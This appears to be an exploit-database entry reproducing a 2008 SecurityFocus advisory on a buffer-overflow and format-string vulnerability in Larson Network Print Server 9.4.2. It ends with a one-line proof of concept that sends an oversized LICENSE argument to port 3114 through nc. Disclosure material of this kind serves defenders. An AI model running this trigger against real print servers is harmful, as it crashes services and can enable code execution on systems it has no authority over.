Larson Network Print Server 9.4.2 build 105 (LstNPS) - NPSpcSVR.exe License Command Remote Overflow

2008-02-11T00:00:00
ID EXPLOITPACK:010E61315834A34E5EC3F228014867DF
Type exploitpack
Reporter Luigi Auriemma
Modified 2008-02-11T00:00:00

Description

Larson Network Print Server 9.4.2 build 105 (LstNPS) - NPSpcSVR.exe License Command Remote Overflow

                                        
                                            source: https://www.securityfocus.com/bid/27732/info

Larson Software Technology Network Print Server is prone to a format-string vulnerability and a buffer-overflow vulnerability.

An attacker can exploit these issues to execute arbitrary code within the context of the affected application or crash the application, denying service to legitimate users.

Network Print Server 9.4.2 build 105 and prior versions are affected. 

echo LICENSE aaaaa...160...aaaaa|nc SERVER 3114 -v -v